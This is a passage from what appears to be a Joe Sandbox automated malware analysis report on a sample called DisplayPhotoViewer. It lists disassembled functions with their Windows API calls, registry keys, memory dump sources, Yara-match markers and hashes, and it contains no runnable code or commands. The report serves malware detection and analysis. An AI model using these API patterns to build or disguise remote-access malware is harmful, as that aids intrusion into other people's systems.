                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$Free$AddressErrorExitLastLoadMessageProcProcesswsprintf
                                                                                                    • String ID: ..\ctl32\util.cpp$DllGetVersion$pdwMajorVer$pdwMinorVer
                                                                                                    • API String ID: 2160193376-301070788
                                                                                                    • Opcode ID: f72487b1c34848008531afd49dcfa56d59ee60866eefa4b903fc90f0f2916868
                                                                                                    • Instruction ID: d5dfde28fed9fca4f06e2356dccac701138166a452b5a4df9309278874aacc12
                                                                                                    • Opcode Fuzzy Hash: f72487b1c34848008531afd49dcfa56d59ee60866eefa4b903fc90f0f2916868
                                                                                                    • Instruction Fuzzy Hash: B4315275B0011E9BDB00DF99E8917EEFBB4EF88719F10406EED19A3344DB3059008B91
                                                                                                    Function 1113B690 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 1113B580: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 1113B5F0
                                                                                                      • Part of subcall function 1113B580: RegCloseKey.ADVAPI32(?), ref: 1113B654
                                                                                                    • _memset.LIBCMT ref: 1113B6D5
                                                                                                    • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1113B6EE
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 1113B715
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1113B727
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1113B73F
                                                                                                    • GetSystemDefaultLangID.KERNEL32 ref: 1113B74A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                                    • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                    • API String ID: 4251163631-545709139
                                                                                                    • Opcode ID: b00d51b772490356f7c0ca0cb28ac987f73d25bc21e0bcfeda20ca6954cdff0a
                                                                                                    • Instruction ID: 2d4a2ecb4d16ed5d04c77fd2c988c35691fcc6a36e1a8d2ee2213ed3d985060b
                                                                                                    • Opcode Fuzzy Hash: b00d51b772490356f7c0ca0cb28ac987f73d25bc21e0bcfeda20ca6954cdff0a
                                                                                                    • Instruction Fuzzy Hash: AE310530E216258BDB12CF34C989B9AFBA4FB8432AF444175D818C33C8E7304984CB91
                                                                                                    Function 11123400 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 78libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,?,-00000001,?,?,?,?,?,?,?,1102C8BD,?,?,11189200), ref: 11123425
                                                                                                    • GetProcAddress.KERNEL32(00000000,SendARP), ref: 1112343E
                                                                                                    • wsprintfA.USER32 ref: 1112348B
                                                                                                    • wsprintfA.USER32 ref: 111234A3
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 111234B8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Librarywsprintf$AddressFreeLoadProc
                                                                                                    • String ID: %02x$IPHLPAPI.DLL$SendARP
                                                                                                    • API String ID: 435568443-4085816232
                                                                                                    • Opcode ID: d63983c9ea1225866dbb2f5084bed46e681694d626be9cfb5e7440865b14aee3
                                                                                                    • Instruction ID: 011d8180afc1c203709bd9e3b24c43e87b462e2febb0207dce4d194347a75828
                                                                                                    • Opcode Fuzzy Hash: d63983c9ea1225866dbb2f5084bed46e681694d626be9cfb5e7440865b14aee3
                                                                                                    • Instruction Fuzzy Hash: 2621A175E001599BCB05CF96DD849EEFBB9EF8C714F114158EC14A3300E6389A45CBA1
                                                                                                    Function 1070CC8F Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,10709BC7,?,Microsoft Visual C++ Runtime Library,00012010,?,10710518,?,1071220C,?,?,?,Runtime Error!Program: ), ref: 1070CCA1
                                                                                                    • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 1070CCB9
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 1070CCCA
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 1070CCD7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                    • API String ID: 2238633743-4044615076
                                                                                                    • Opcode ID: 81cf9ab2e73bd2ae6b72a4f84118d75c389a51081046dfb8714da5999557d4f4
                                                                                                    • Instruction ID: 9cbd5ccaeb7f48cd027657441307522b1a2e84fe51959450810816aedbd6c2f4
                                                                                                    • Opcode Fuzzy Hash: 81cf9ab2e73bd2ae6b72a4f84118d75c389a51081046dfb8714da5999557d4f4
                                                                                                    • Instruction Fuzzy Hash: 0A01B135B00365EBD7018FB5CCC095B3BF8EB4D6817144529F504DA2A0DBB0C9499BB0
                                                                                                    Function 1070EB1A Relevance: 13.7, APIs: 9, Instructions: 221COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CompareStringW.KERNEL32(00000000,00000000,10710274,00000001,10710274,00000001,00000000,0B8A11CC,?), ref: 1070EB58
                                                                                                    • CompareStringA.KERNEL32(00000000,00000000,10710270,00000001,10710270,00000001), ref: 1070EB75
                                                                                                    • CompareStringA.KERNEL32(?,?,00000000,?,?,?,00000000,0B8A11CC,?), ref: 1070EBD3
                                                                                                    • GetCPInfo.KERNEL32(?,00000000,00000000,0B8A11CC,?), ref: 1070EC24
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000), ref: 1070ECA3
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,?), ref: 1070ED04
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 1070ED17
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 1070ED63
                                                                                                    • CompareStringW.KERNEL32(?,?,?,?,?,00000000,?,00000000), ref: 1070ED7B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharCompareMultiStringWide$Info
                                                                                                    • String ID:
                                                                                                    • API String ID: 1651298574-0
                                                                                                    • Opcode ID: aa89c38a96ad7143802d2ee4043634e062d8d2e224aa4c43372f55d18a1d06df
                                                                                                    • Instruction ID: b46dbd8519462bf83e24de8df201a28ac7dbc380f27016f5bec8adbf6d4394c7
                                                                                                    • Opcode Fuzzy Hash: aa89c38a96ad7143802d2ee4043634e062d8d2e224aa4c43372f55d18a1d06df
                                                                                                    • Instruction Fuzzy Hash: 53719172A0025AEFDF119F50CC85ADF7FFAEB0A750F114A2AF951A6164D3328851DBA0
                                                                                                    Function 10708241 Relevance: 13.7, APIs: 9, Instructions: 177COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LCMapStringW.KERNEL32(00000000,00000100,10710274,00000001,00000000,00000000,74DEE860,10723E48,?,00000003,00000000,00000001,00000000,?,?,10704A40), ref: 10708283
                                                                                                    • LCMapStringA.KERNEL32(00000000,00000100,10710270,00000001,00000000,00000000,?,?,10704A40,?), ref: 1070829F
                                                                                                    • LCMapStringA.KERNEL32(?,?,00000000,00000001,00000000,00000003,74DEE860,10723E48,?,00000003,00000000,00000001,00000000,?,?,10704A40), ref: 107082E8
                                                                                                    • MultiByteToWideChar.KERNEL32(?,10723E49,00000000,00000001,00000000,00000000,74DEE860,10723E48,?,00000003,00000000,00000001,00000000,?,?,10704A40), ref: 10708320
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,?,00000000), ref: 10708378
                                                                                                    • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 1070838E
                                                                                                    • LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 107083C1
                                                                                                    • LCMapStringW.KERNEL32(?,?,?,?,?,00000000), ref: 10708429
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 352835431-0
                                                                                                    • Opcode ID: b96e9807655d678c8ff4b095eb4075a532090212609265f3cce4253ceed5fbc0
                                                                                                    • Instruction ID: 218e984178609d7a5ddc3d520bc6d708beb4a4275da23bb3dbe217fcc32717c9
                                                                                                    • Opcode Fuzzy Hash: b96e9807655d678c8ff4b095eb4075a532090212609265f3cce4253ceed5fbc0
                                                                                                    • Instruction Fuzzy Hash: EC518F3150024AEFCF528F95CC85ADFBFB9FB8AB90F108219F954A11A4D7728D50DBA4
                                                                                                    Function 111112C0 Relevance: 13.7, APIs: 9, Instructions: 154COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowRect.USER32(?,?), ref: 11111337
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 11111349
                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 11111357
                                                                                                    • GetSystemMetrics.USER32(00000003), ref: 1111136F
                                                                                                    • GetSystemMetrics.USER32(0000004E), ref: 111113BE
                                                                                                    • GetSystemMetrics.USER32(0000004F), ref: 111113C8
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 111113DB
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 111113EE
                                                                                                    • GetWindowRect.USER32(?,?), ref: 1111145B
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004C), ref: 11090E7E
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004D), ref: 11090E87
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004E), ref: 11090E8E
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(00000000), ref: 11090E97
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004F), ref: 11090E9D
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(00000001), ref: 11090EA5
                                                                                                      • Part of subcall function 11090E00: _memset.LIBCMT ref: 11090E2F
                                                                                                      • Part of subcall function 11090E00: FreeLibrary.KERNEL32(00000000,?,75C04920,111114D7,00000002), ref: 11090E3A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem$Window$Rect$FreeLibraryPoints_memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 314733930-0
                                                                                                    • Opcode ID: 034b7ce4c3f93dcdb5c861d8618fa725daa4a9f12a8ab3782a76fd2ba96d55ce
                                                                                                    • Instruction ID: 7b05305e9799a146fa0c52095186d33d1ccf680bff87c03a50374dcfc8c3d40a
                                                                                                    • Opcode Fuzzy Hash: 034b7ce4c3f93dcdb5c861d8618fa725daa4a9f12a8ab3782a76fd2ba96d55ce
                                                                                                    • Instruction Fuzzy Hash: 42611875E0061A9FCB14CF68C984BEDF7F5FB48704F0046AAD919A7684DB70AA81CF90
                                                                                                    Function 11061530 Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • OpenPrinterA.WINSPOOL.DRV(?,?,00000000,00000000), ref: 1106158F
                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000), ref: 11061598
                                                                                                    • GetPrinterA.WINSPOOL.DRV(?,00000002,00000000,00000000,?,?,?,00000000,00000000), ref: 1106160C
                                                                                                    • GetLastError.KERNEL32(?,00000002,00000000,00000000,?,?,?,00000000,00000000), ref: 11061615
                                                                                                    • _malloc.LIBCMT ref: 11061629
                                                                                                      • Part of subcall function 111583B1: __FF_MSGBANNER.LIBCMT ref: 111583CA
                                                                                                      • Part of subcall function 111583B1: __NMSG_WRITE.LIBCMT ref: 111583D1
                                                                                                      • Part of subcall function 111583B1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 111583F6
                                                                                                    • GetPrinterA.WINSPOOL.DRV(?,00000002,00000000,?,?,00000000,?), ref: 11061649
                                                                                                    • _free.LIBCMT ref: 11061662
                                                                                                    • GetLastError.KERNEL32(?,00000002,00000000,00000000,?,?,?,00000000,00000000), ref: 1106166C
                                                                                                    • ClosePrinter.WINSPOOL.DRV(?), ref: 11061679
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastPrinter$AllocateCloseHeapOpenPrinter._free_malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2468972630-0
                                                                                                    • Opcode ID: d1b1e68c699c4f3f96c0dfa89df70855db5279da2695fee380a5fca8f14e12bd
                                                                                                    • Instruction ID: 6c079ffdbf9b044437703f4a85509ce99a6c39382adaa8f3e776f3d339d321d6
                                                                                                    • Opcode Fuzzy Hash: d1b1e68c699c4f3f96c0dfa89df70855db5279da2695fee380a5fca8f14e12bd
                                                                                                    • Instruction Fuzzy Hash: 01312CB9D003599BDB60DFA49C8499EF7BC9B45308F1445E8F919D7101EA34AE48CB91
                                                                                                    Function 110C7250 Relevance: 13.6, APIs: 9, Instructions: 89windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 11107A40: GetCurrentThreadId.KERNEL32 ref: 11107A4E
                                                                                                      • Part of subcall function 11107A40: EnterCriticalSection.KERNEL32(00000000,75BF3760,00000000,111E4128,?,110C7265,00000000,75BF3760), ref: 11107A58
                                                                                                      • Part of subcall function 11107A40: LeaveCriticalSection.KERNEL32(00000000,75C0A1D0,00000000,?,110C7265,00000000,75BF3760), ref: 11107A78
                                                                                                    • EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,11059DFB,?,?,?,?,11025293,00000000,?,?,00000000), ref: 110C726B
                                                                                                    • SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110C7298
                                                                                                    • SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110C72AA
                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,11025293,00000000,?,?,00000000), ref: 110C72B4
                                                                                                    • IsDialogMessageA.USER32(00000000,?,?,?,?,11025293,00000000,?,?,00000000), ref: 110C72CB
                                                                                                    • LeaveCriticalSection.KERNEL32(00000000,?,?,?,11025293,00000000,?,?,00000000), ref: 110C72E1
                                                                                                    • DestroyWindow.USER32(00000000,?,?,?,11025293,00000000,?,?,00000000), ref: 110C72F1
                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,11025293,00000000,?,?,00000000), ref: 110C72FB
                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,11025293,00000000,?,?,00000000), ref: 110C7311
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1497311044-0
                                                                                                    • Opcode ID: 3539aca70cc77286193dfc50594548d354fa47dc182412ca9ef8d2133265bd56
                                                                                                    • Instruction ID: 1f7ec4641051313e9c244ae3aa0c3cec66dcab1a3eeb14b8810ca7964845f047
                                                                                                    • Opcode Fuzzy Hash: 3539aca70cc77286193dfc50594548d354fa47dc182412ca9ef8d2133265bd56
                                                                                                    • Instruction Fuzzy Hash: 4721F536B01614ABD711DFA8EC84B9EB7E9EB89765F1080E5FD08D7244D771AD008BE0
                                                                                                    Function 1100D370 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(00000000,1118A8B8), ref: 1100D384
                                                                                                    • GetProcAddress.KERNEL32(00000000,1118A8A8), ref: 1100D398
                                                                                                    • GetProcAddress.KERNEL32(00000000,1118A898), ref: 1100D3AD
                                                                                                    • GetProcAddress.KERNEL32(00000000,1118A888), ref: 1100D3C1
                                                                                                    • GetProcAddress.KERNEL32(00000000,1118A87C), ref: 1100D3D5
                                                                                                    • GetProcAddress.KERNEL32(00000000,1118A85C), ref: 1100D3EA
                                                                                                    • GetProcAddress.KERNEL32(00000000,1118A83C), ref: 1100D3FE
                                                                                                    • GetProcAddress.KERNEL32(00000000,1118A82C), ref: 1100D412
                                                                                                    • GetProcAddress.KERNEL32(00000000,1118A81C), ref: 1100D427
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
